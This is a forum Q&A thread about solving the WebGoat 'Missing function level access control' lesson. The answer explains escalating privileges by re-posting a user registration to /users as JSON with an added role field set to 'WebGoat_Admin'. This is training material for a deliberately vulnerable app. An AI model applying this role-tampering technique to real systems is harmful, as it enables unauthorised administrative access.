3

I've recently installed WebGoat 8.00M12 on my computer and I tried to solve the "Access Control" section for a demonstration in my class.

Everything was simple and smooth till I got stuck at the last point in "Missing function level access control lesson" subsection, and I got stuck there for 2 full days now. Can anyone help me, please?

The question is this:

Question

Note: the previous page contained 2 CSS hidden hyperlinks (/users and /config) that doesn't work when i click on them or try them (These are supposedly only available for the admin)

What I have done:

  • Using burp suite to spider the web application the intended directories where not found.
  • Tried many combinations like (show-users users list-users display-users) on many directories but just couldn't find the "users page" they talked about in the hints, but I did found some useless page at /WebGoat/users which contained only "su 1" just FYI.

Helpful notes:

  • The WebApplication runs a RESTful structure.
  • It runs on Java (I tried reading the source code on github but didn't understand anything).
  • Download WebGoat v8.0 (if you care) Here
Anders
  • 64,406
  • 24
  • 178
  • 215
Jamil Hneini
  • 133
  • 5

1 Answers1

2

Well its kind of a hard challenge.

First when you click on the human symbol to logout you should notice there is a role: User.

Also when you visit /users you should notice in the source code a hidden button like "admin" or something like that. So you need to try somehow change the role.

Logout and try to register again. Notice the post parameters.

So do the same on /users but with:

parameters in a list --

{"parameter1":"value", etc }

add a new parameter role

( value: Admin wont work so try WebGoat_Admin)

and also change

content-type:application/json

S.L. Barth
  • 5,486
  • 8
  • 38
  • 47
aleale
  • 36
  • 3
  • Thank you, although this is definitely a bit late xD i already solved the challenge similar to the way you described it – Jamil Hneini Aug 04 '18 at 18:55